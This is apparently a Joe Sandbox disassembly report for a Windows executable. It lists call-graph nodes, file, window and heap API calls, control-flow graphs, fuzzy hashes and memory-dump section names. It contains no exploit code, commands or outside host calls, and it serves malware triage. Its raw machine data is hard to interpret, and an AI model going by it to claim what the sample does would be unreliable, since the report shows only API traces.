8858->8858 8859 14000afc0 _wcsicmp 8858->8859 8858->8863 8860 14000b086 8859->8860 8861 14000afc0 _wcsicmp 8860->8861 8864 14000b099 8861->8864 8862 14000b510 _wcsicmp 8862->8864 8863->8842 8864->8862 8864->8863 8866 14000b524 8865->8866 8867 14000b515 8865->8867 8866->8850 8868 1400070cc _wcsicmp 8867->8868 8869 14000b51e 8867->8869 8868->8850 8868->8865 8869->8850 8509 14000bc38 8510 14000bc84 8509->8510 8511 14000bc4c 8509->8511 8511->8510 8512 14000bc51 SendMessageW Sleep PostMessageW 8511->8512 8512->8510 8870 1400146b7 8871 1400146d7 8870->8871 8873 140014747 8870->8873 8872 1400148e1 memmove 8871->8872 8871->8873 8872->8873 8517 14000e83b HeapAlloc 8518 14000e87d 8517->8518 8519 14000303f 8530 140012600 TlsGetValue 8519->8530 8521 140003044 8522 140012360 HeapFree 8521->8522 8523 140003058 8522->8523 8524 140012360 HeapFree 8523->8524 8525 14000306a 8524->8525 8526 140012360 HeapFree 8525->8526 8527 14000307c 8526->8527 8528 140012360 HeapFree 8527->8528 8529 14000308e 8528->8529 8530->8521 8874 1400172c0 8875 1400172f0 8874->8875 8875->8875 8876 1400172fb MultiByteToWideChar malloc MultiByteToWideChar 8875->8876 8531 14000c040 8536 140011248 EnterCriticalSection 8531->8536 8534 14000c075 8535 14000c05d CloseHandle 8535->8534 8537 14001127a LeaveCriticalSection 8536->8537 8538 14001126c 8536->8538 8539 14000c058 8537->8539 8538->8537 8539->8534 8539->8535 8877 1400048c0 8886 140012600 TlsGetValue 8877->8886 8879 1400048c5 8880 140012360 HeapFree 8879->8880 8881 1400048d9 8880->8881 8882 140012360 HeapFree 8881->8882 8883 1400048eb 8882->8883 8884 140012360 HeapFree 8883->8884 8885 1400048fd 8884->8885 8886->8879 9038 14000e540 9039 140011248 2 API calls 9038->9039 9040 14000e55f 9039->9040 9041 14000b740 9044 14000b758 9041->9044 9084 14000b5d8 9044->9084 9046 14000b790 9047 14000b5d8 2 API calls 9046->9047 9048 14000b79b 9047->9048 9049 14000b5d8 2 API calls 9048->9049 9050 14000b7a6 9049->9050 9051 14000b7b2 GetStockObject 9050->9051 9052 14000b7c3 LoadIconW LoadCursorW RegisterClassExW 9050->9052 9051->9052 9053 14000be5c 3 API calls 9052->9053 9054 14000b83f 9053->9054 9055 14000bf44 7 API calls 9054->9055 9056 14000b84d 9055->9056 9057 14000b859 IsWindowEnabled 9056->9057 9058 14000b87a 9056->9058 9057->9058 9059 14000b863 EnableWindow 9057->9059 9060 14000be5c 3 API calls 9058->9060 9059->9058 9061 14000b886 GetSystemMetrics GetSystemMetrics CreateWindowExW 9060->9061 9062 14000b902 6 API calls 9061->9062 9063 14000bb96 9061->9063 9065 14000ba12 SendMessageW wcslen wcslen SendMessageW 9062->9065 9066 14000ba53 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 9062->9066 9064 14000bba4 9063->9064 9087 140012810 TlsGetValue 9063->9087 9068 14000bba9 HeapFree 9064->9068 9069 14000bbbb 9064->9069 9065->9066 9070 14000bb48 9066->9070 9068->9069 9071 14000bbd2 9069->9071 9072 14000bbc0 HeapFree 9069->9072 9073 14000bb51 9070->9073 9074 14000bb0a GetMessageW 9070->9074 9076 14000bbd7 HeapFree 9071->9076 9077 14000b751 9071->9077 9072->9071 9078 14000bb56 DestroyAcceleratorTable 9073->9078 9079 14000bb5f 9073->9079 9074->9073 9075 14000bb20 TranslateAcceleratorW 9074->9075 9075->9070 9080 14000bb34 TranslateMessage DispatchMessageW 9075->9080 9076->9077 9078->9079 9079->9063 9081 14000bb68 wcslen 9079->9081 9080->9070 9082 1400126d0 3 API calls 9081->9082 9083 14000bb77 wcscpy HeapFree 9082->9083 9083->9063 9085 14000b5ea wcslen HeapAlloc 9084->9085 9086 14000b60e 9084->9086 9085->9086 9086->9046 9087->9064 8540 14000c444 8541 14000c455 8540->8541 8542 14000c44d SetEnvironmentVariableW 8540->8542 8542->8541 8887 14000cec4 8888 14000cee9 8887->8888 8890 14000cf4b 8887->8890 8888->8890 8893 14000cf02 8888->8893 8895 14000d140 8888->8895 8893->8890 8894 140016828 5 API calls 8893->8894 8902 14000d1f0 8893->8902 8911 14000d02c 8893->8911 8894->8893 8899 14000d15b 8895->8899 8896 14000d1b4 memset 8897 14000d1d0 8896->8897 8897->8893 8898 14000d163 HeapFree 8898->8899 8899->8896 8899->8898 8900 140016bb0 HeapFree 8899->8900 8901 1400116f4 3 API calls 8899->8901 8900->8899 8901->8899 8903 14000d230 8902->8903 8904 14000d210 8902->8904 8905 14001147c 4 API calls 8903->8905 8904->8903 8906 14000d21d 8904->8906 8907 14000d22e 8905->8907 8906->8907 8908 140016bb0 HeapFree 8906->8908 8909 14000d281 memset 8907->8909 8910 14000d295 8907->8910 8908->8907 8909->8910 8910->8893 8912 14000d073 8911->8912 8913 14000d04c 8911->8913 8918 14000d08f 8912->8918 8932 14000d3a4 8912->8932 8926 14000cf74 8913->8926 8915 14000d051 8915->8912 8917 14000d059 8915->8917 8919 14000d06e 8917->8919 8923 140016bb0 HeapFree 8917->8923 8920 14001147c 4 API calls 8918->8920 8921 14000d11c 8919->8921 8922 14000d108 memset 8919->8922 8924 14000d0a6 8920->8924 8921->8893 8922->8921 8923->8919 8924->8921 8925 14000d0ae wcslen HeapAlloc wcscpy 8924->8925 8925->8919 8927 14000cfe2 8926->8927 8928 14000cfa2 8926->8928 8930 14000cff8 wcscmp 8927->8930 8931 14000cfa7 8927->8931 8929 14000d3a4 tolower 8928->8929 8929->8931 8930->8927 8930->8931 8931->8915 8933 14000d3c7 tolower 8932->8933 8934 14000d3b8 8933->8934 8935 14000d3d0 8933->8935 8934->8933 8935->8918 9088 140003144 9089 140003147 9088->9089 9090 140012360 HeapFree 9089->9090 9091 140003156 9090->9091 9092 140012360 HeapFree 9091->9092 9093 140003168 9092->9093 8543 140002648 8544 14000264f 8543->8544 8545 140012360 HeapFree 8544->8545 8546 140002666 8545->8546 8547 140012360 HeapFree 8546->8547 8548 140002678 8547->8548 8549 140012360 HeapFree 8548->8549 8550 14000268a 8549->8550 8551 140012360 HeapFree 8550->8551 8552 14000269c 8551->8552 8553 140012360 HeapFree 8552->8553 8554 1400026ae 8553->8554 8936 1400088c9 8937 1400088fa 8936->8937 8938 1400088e0 8936->8938 8940 14000afc0 _wcsicmp 8937->8940 8941 1400088eb 8937->8941 8939 140009da0 _wcsicmp 8938->8939 8938->8941 8939->8941 8940->8941 8555 14000b64c 8556 14000b667 8555->8556 8557 14000b70e UnregisterClassW 8555->8557 8559 14000b674 DefWindowProcW 8556->8559 8560 14000b67f 8556->8560 8564 14000b68b 8556->8564 8558 14000b72c 8557->8558 8559->8558 8563 14000b695 GetWindowLongPtrW GetWindowTextLengthW HeapAlloc GetWindowTextW 8560->8563 8560->8564 8561 14000b6ea EnableWindow 8562 14000b6fc 8561->8562 8567 14000bf44 8562->8567 8563->8564 8564->8558 8564->8561 8564->8562 8568 14000bf57 EnumWindows 8567->8568 8572 14000bfbb 8567->8572 8570 14000b703 DestroyWindow 8568->8570 8571 14000bf77 GetCurrentThreadId 8568->8571 8569 14000bfc7 GetCurrentThreadId 8569->8572 8570->8558 8573 14000bf85 8571->8573 8572->8569 8572->8570 8574 14000bfdb EnableWindow 8572->8574 8576 14000bff0 SetWindowPos 8572->8576 8578 140011c68 8572->8578 8573->8570 8573->8571 8575 14000bf8b SetWindowPos 8573->8575 8574->8572 8575->8573 8576->8572 8579 140011c74 HeapFree 8578->8579 8581 14001f820 8579->8581 9098 140002b4c 9099 1400123e0 21 API calls 9098->9099 9100 140002b6a 9099->9100 8942 140012cd0 TlsGetValue HeapFree HeapFree 8274 14000de50 8292 1400112a8 EnterCriticalSection 8274->8292 8276 14000de98 8277 14000e04d 8276->8277 8278 14000deb6 8276->8278 8279 14000defb 8276->8279 8282 14000dec9 8278->8282 8283 14000decd CreateFileW 8278->8283 8280 14000df42 8279->8280 8281 14000df00 8279->8281 8286 14000df5f CreateFileW 8280->8286 8287 14000dfb7 8280->8287 8284 14000df13 8281->8284 8285 14000df17 CreateFileW 8281->8285 8282->8283 8283->8287 8284->8285 8285->8287 8286->8287 8288 14000df8d CreateFileW 8286->8288 8287->8277 8289 14000dff9 8287->8289 8290 14000dfe1 HeapAlloc 8287->8290 8288->8287 8289->8277 8291 14000e036 SetFilePointer 8289->8291 8290->8289 8291->8277 8293 1400112e3 8292->8293 8294 1400112d0 8292->8294 8296 140011312 8293->8296 8297 1400112e9 HeapReAlloc 8293->8297 8295 140011cb0 HeapAlloc 8294->8295 8298 1400112de 8295->8298 8299 14001132d HeapAlloc 8296->8299 8300 14001131d 8296->8300 8297->8296 8301 140011352 LeaveCriticalSection 8298->8301 8299->8300 8300->8301 8301->8276 8943 1400086d0 8944 140008701 8943->8944 8945 1400086ee 8943->8945 8946 140008710 CharLowerW CharLowerW 8944->8946 8947 14000873e 8944->8947 8946->8944 8946->8947 8582 140002853 8603 1400123e0 8582->8603 8586 14000286b 8616 1400121c0 GetLastError TlsGetValue SetLastError 8586->8616 8588 140002889 8617 140012450 8588->8617 8590 140002898 8622 1400121c0 GetLastError TlsGetValue SetLastError 8590->8622 8592 1400028a6 8623 1400121c0 GetLastError TlsGetValue SetLastError 8592->8623 8594 1400028ba 8624 14000c8e0 8594->8624 8598 1400028d4 8629 1400125d0 TlsGetValue 8598->8629 8600 1400028e5 8630 14000b574 8600->8630 8602 1400028fb 8604 1400123ed 8603->8604 8605 14001240f TlsGetValue 8603->8605 8606 140012060 5 API calls 8604->8606 8607 140002861 8605->8607 8608 140012420 8605->8608 8609 1400123f2 TlsGetValue 8606->8609 8615 1400121c0 GetLastError TlsGetValue SetLastError 8607->8615 8646 140012c50 HeapAlloc HeapAlloc TlsSetValue 8608->8646 8637 140016fb4 8609->8637 8612 140012425 TlsGetValue 8614 140016fb4 13 API calls 8612->8614 8614->8607 8615->8586 8616->8588 8618 140012477 8617->8618 8619 140012469 wcslen 8617->8619 8620 1400126d0 3 API calls 8618->8620 8619->8618 8621 140012485 8620->8621 8621->8590 8622->8592 8623->8594 8625 14000c8f0 8624->8625 8625->8625 8626 1400126d0 3 API calls 8625->8626 8627 1400028ca 8626->8627 8628 140012520 TlsGetValue 8627->8628 8628->8598 8629->8600 8647 14000be5c GetForegroundWindow 8630->8647 8633 14000bf44 7 API calls 8634 14000b5a3 MessageBoxW 8633->8634 8635 14000bf44 7 API calls 8634->8635 8636 14000b5bf 8635->8636 8636->8602 8638 140016fe2 TlsAlloc InitializeCriticalSection 8637->8638 8639 140017001 TlsGetValue 8637->8639 8638->8639 8640 1400170d6 HeapAlloc 8639->8640 8641 140017019 HeapAlloc 8639->8641 8642 14001240d 8640->8642 8641->8642 8643 140017039 EnterCriticalSection 8641->8643 8642->8607 8644 140017051 7 API calls 8643->8644 8645 14001704e 8643->8645 8644->8640 8645->8644 8646->8612 8648 14000b596 8647->8648 8649 14000be76 GetWindowThreadProcessId GetCurrentProcessId 8647->8649 8648->8633 8649->8648 8948 14000c2d8 8953 14000c188 8948->8953 8951 1400126d0 3 API calls 8952 14000c30c 8951->8952 8957 140011044 TlsGetValue 8953->8957 8956 14000c1c5 8956->8951 8958 14000c1a9 GetCommandLineW 8957->8958 8959 14001106a HeapAlloc TlsSetValue 8957->8959 8958->8956 8960 14001109c 8959->8960 8961 140016fb4 13 API calls 8960->8961 8961->8958 9176 1400031d9 9177 1400031dc 9176->9177 9178 140012360 HeapFree 9177->9178 9179 1400031eb 9178->9179 9180 14000c3dc GetEnvironmentVariableW 9181 14000c408 9180->9181 9182 1400126d0 3 API calls 9181->9182 9183 14000c413 GetEnvironmentVariableW 9182->9183 9184 140012fdd 9187 140012fe5 9184->9187 9185 140015060 3 API calls 9186 14001449c 9185->9186 9187->9185 9187->9186 9101 140017360 9102 1400173e8 9101->9102 9103 140017387 MultiByteToWideChar 9101->9103 9104 1400126d0 3 API calls 9102->9104 9103->9102 9107 1400173b9 9103->9107 9106 1400173f1 9104->9106 9108 1400126d0 3 API calls 9107->9108 9109 1400173c2 MultiByteToWideChar 9108->9109 9109->9106

              Control-flow Graph

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
              • String ID: GetLongPathNameW$Kernel32.DLL
              • API String ID: 820969696-2943376620
              • Opcode ID: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
              • Instruction ID: 230e630dded4efaa915c31c3904b5b857ecb3aa047886c8d585020238d201ac5
              • Opcode Fuzzy Hash: c3e4c02f6cb4c0a015bd45f3fcc7f186f913e40d0dd92e763cbbe5d307640fc6
              • Instruction Fuzzy Hash: 74116D3171074086EF159F27A9443A967A5FB8CFC0F481029FF4E4B7A5DE39C4518340

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
              • String ID:
              • API String ID: 4232179356-0
              • Opcode ID: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
              • Instruction ID: 77aa1fd205ec2d48eabb088ee49ef1dd4fb6b524f1726a3c9e39dbd98a5b5f3b
              • Opcode Fuzzy Hash: 30cb002adb08c8c9ee0a6baba99c0a0f0998ecb4b16737804f1fb03ce3a8d9fe
              • Instruction Fuzzy Hash: 138162FBE69644E5EA07B763BC46BED5220D3AD3D4F504410FF08062A3EE3995EA4B10

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 94 14000de50-14000de9e call 1400112a8 97 14000dea4-14000deb4 94->97 98 14000e098-14000e09b 94->98 100 14000deb6-14000dec7 97->100 101 14000defb-14000defe 97->101 99 14000e07f-14000e097 98->99 104 14000dec9 100->104 105 14000decd-14000def6 CreateFileW 100->105 102 14000df42-14000df46 101->102 103 14000df00-14000df11 101->103 109 14000dfb7 102->109 110 14000df48-14000df59 102->110 107 14000df13 103->107 108 14000df17-14000df40 CreateFileW 103->108 104->105 106 14000dfbc-14000dfc0 105->106 113 14000dfc6-14000dfc9 106->113 114 14000e05d-14000e06f call 1400111dc 106->114 107->108 108->106 109->106 111 14000df5b 110->111 112 14000df5f-14000df8b CreateFileW 110->112 111->112 112->113 116 14000df8d-14000dfb5 CreateFileW 112->116 113->114 117 14000dfcf-14000dfd8 113->117 118 14000e074-14000e07c 114->118 116->106 119 14000dff9 117->119 120 14000dfda-14000dfdf 117->120 118->99 121 14000dffd-14000e02d 119->121 120->119 122 14000dfe1-14000dff7 HeapAlloc 120->122 123 14000e04d-14000e05b 121->123 124 14000e02f-14000e034 121->124 122->121 123->114 123->118 124->123 125 14000e036-14000e047 SetFilePointer 124->125 125->123
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
              • String ID:
              • API String ID: 2685021396-0
              • Opcode ID: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
              • Instruction ID: 19dccfeb25466122eda91520b9d3e1282c027ca6efa307134c14a125255dccfb
              • Opcode Fuzzy Hash: 90872b3e34ccf7d1475fd6165b8231d8d7d244be71cfa9b75e83e52ddb76e0bc
              • Instruction Fuzzy Hash: CA51B1B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 126 14000593c-14000593e 127 140005945-140005954 126->127 127->127 128 140005956-140005979 call 1400123e0 127->128 131 14000597b-140005987 128->131 132 140005a39-140005a53 131->132 133 14000598d-140005a33 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 131->133 135 140005a55-140005a61 132->135 133->131 133->132 137 140005b13-140005b2d 135->137 138 140005a67-140005b0d call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 135->138 141 140005b2f-140005b3b 137->141 138->135 138->137 144 140005b41-140005be7 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 141->144 145 140005bed-140005c07 141->145 144->141 144->145 149 140005c09-140005c15 145->149 153 140005cc7-140005ce1 149->153 154 140005c1b-140005cc1 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 149->154 159 140005ce3-140005cef 153->159 154->149 154->153 164 140005da1-140005dbb 159->164 165 140005cf5-140005d91 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 159->165 171 140005dbd-140005dc9 164->171 286 140005d96-140005d9b 165->286 177 140005e7f-140005e99 171->177 178 140005dcf-140005e79 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 171->178 180 140005e9b-140005ea7 177->180 178->171 178->177 188 140005f5d-140005f77 180->188 189 140005ead-140005f57 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 180->189 198 140005f79-140005f85 188->198 189->180 189->188 207 14000603b-140006055 198->207 208 140005f8b-140006035 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 198->208 218 140006057-140006063 207->218 208->198 208->207 228 140006119-14000657b call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400047e2 call 140012210 call 14000c2bc GetModuleHandleW call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 1400121c0 * 4 call 140010ba0 call 1400125d0 call 140007dc0 call 140012210 call 140004134 call 1400121c0 * 2 call 140002c46 call 140006a58 call 140001e57 call 1400067aa call 1400121c0 * 2 call 14000ca70 call 1400049ea call 140012210 PathRemoveBackslashW call 140002bab call 1400121c0 * 3 call 140003cc9 call 140012520 call 1400125d0 call 14000c45c call 140006a58 call 1400121c0 call 140012450 * 2 call 140012210 call 1400121c0 * 2 call 1400026bb call 140012210 call 140004ee2 call 1400121c0 call 140012450 call 140012210 PathQuoteSpacesW call 1400121c0 call 140012450 * 3 call 140012210 PathQuoteSpacesW 218->228 229 140006069-140006113 call 1400121c0 * 2 call 140007c90 call 140012210 call 1400121c0 call 140012450 * 2 call 140012210 218->229 428 1400065a1-1400065a6 call 140003ddc 228->428 429 14000657d-14000659f call 140007284 228->429 229->218 229->228 286->159 286->164 433 1400065ab-1400067a9 call 1400121c0 * 2 call 140012450 * 3 call 140012520 call 1400121c0 * 2 call 14000daa8 call 140012520 call 1400121c0 call 140012450 * 2 call 1400125d0 * 3 call 1400029c8 call 140006a58 call 140002930 call 140012360 * 10 428->433 429->433
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
              • String ID:
              • API String ID: 2499486723-0
              • Opcode ID: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
              • Instruction ID: 8b331e692c67017886d6c7239b17c9f9d27d3c51ffaf72a1bb59c68ee6c0545e
              • Opcode Fuzzy Hash: 2a27bf2c4694b33070e05cd964385f6fd582395640ee0e109cac132e63eb8708
              • Instruction Fuzzy Hash: 83723BB6E25548D6EA16B7B7B8877E91220A3AD394F500411FF4C0B363EE39C5F64B10

              Control-flow Graph

              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FilePointermemmove
              • String ID:
              • API String ID: 2366752189-0
              • Opcode ID: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
              • Instruction ID: b9f44d82ba4cb6c24f152d63ce96d8852f082d92484b54d7365d071901ec84b9
              • Opcode Fuzzy Hash: b4f1478b6fdc608b573b2d6bb241fddc82556d2816959310d2dbf51914ce2f41
              • Instruction Fuzzy Hash: 7541837770468086DB01CF7AF1402ADF7A4EB98BD9F084426EF4C43BA5DA39C591CB50

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 509 14000e3f0-14000e404 510 14000e4f3-14000e4fd 509->510 511 14000e40a-14000e40e 509->511 511->510 512 14000e414-14000e418 511->512 513 14000e483-14000e4a6 call 14000e770 512->513 514 14000e41a-14000e423 512->514 522 14000e4a8-14000e4b5 513->522 523 14000e4ee 513->523 515 14000e451-14000e45b 514->515 516 14000e425 514->516 515->515 519 14000e45d-14000e482 WriteFile 515->519 518 14000e430-14000e43a 516->518 518->518 521 14000e43c-14000e450 call 14000e620 518->521 525 14000e4c5-14000e4d6 WriteFile 522->525 526 14000e4b7-14000e4ba call 14000e620 522->526 523->510 527 14000e4dc-14000e4e8 HeapFree 525->527 530 14000e4bf-14000e4c3 526->530 527->523 530->527
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: FileWrite$FreeHeap
              • String ID:
              • API String ID: 74418370-0
              • Opcode ID: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
              • Instruction ID: 9d08b72cfe526555b527e3d6fc60fa1eae748afb3cf0625e1a419d858907832f
              • Opcode Fuzzy Hash: 3e7180477ba1f40fccd38ab851f43380a29ccb8c1311c53bf450c0723d734870
              • Instruction Fuzzy Hash: 43317EB2205A8082EB22DF16E0453A9B7B0F789BD4F548515EB59577F4DF3EC488CB00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 531 14000d914-14000d922 532 14000d924-14000d95a wcsncpy wcslen 531->532 533 14000d99e 531->533 535 14000d98a-14000d99c CreateDirectoryW 532->535 536 14000d95c-14000d96b 532->536 534 14000d9a0-14000d9a8 533->534 535->534 536->535 537 14000d96d-14000d97b 536->537 537->535 538 14000d97d-14000d988 537->538 538->535 538->536
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CreateDirectorywcslenwcsncpy
              • String ID:
              • API String ID: 961886536-0
              • Opcode ID: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
              • Instruction ID: 5f5e6732187473c7e9a992da28a106256b0abf82a063e4d7cd37b44a9c7c83f6
              • Opcode Fuzzy Hash: fa21f94af638c1889f77ff21a456a4ec01e86cfe5917c6a19cc66424906e9b15
              • Instruction Fuzzy Hash: 100188A621264191EF72DB65E0643E9B350F78C7C4F804523FB8D036A8EE3DC645CB14

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 539 14000b538-14000b573 memset InitCommonControlsEx CoInitialize
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: CommonControlsInitInitializememset
              • String ID:
              • API String ID: 2179856907-0
              • Opcode ID: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
              • Instruction ID: 449a974473b47bcf77cc2e9d1d873e7016711834fb404a36d393ff203d460c1f
              • Opcode Fuzzy Hash: 1d0403c036cf950124697b7ff717d38e0227670877df9763daf1147e72240267
              • Instruction Fuzzy Hash: E0E0E27263658092E785EB22E8857AEB260FB88748FC06105F38B469A5CF3DC659CF00

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 540 1400126d0-1400126f2 TlsGetValue 541 1400126f4-1400126fc 540->541 542 140012700-14001272b 540->542 541->542 543 140012772-14001277f 542->543 544 14001272d-140012770 HeapReAlloc 542->544 545 1400127d0-140012802 543->545 546 140012781-140012789 543->546 544->545 547 140012793-1400127cd HeapReAlloc 546->547 548 14001278b 546->548 547->545 548->547
              APIs
              Memory Dump Source
              • Source File: 00000000.00000002.1781380371.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
              • Associated: 00000000.00000002.1781320019.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781406628.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781470093.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.1781494702.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_140000000_Gq48hjKhZf.jbxd
              Similarity
              • API ID: AllocHeap$Value
              • String ID:
              • API String ID: 3898337583-0
              • Opcode ID: 988988ada6dc82bff9e9c7669f10d32680ca5bffd2b02ccc7cf7ef26e6a306a8
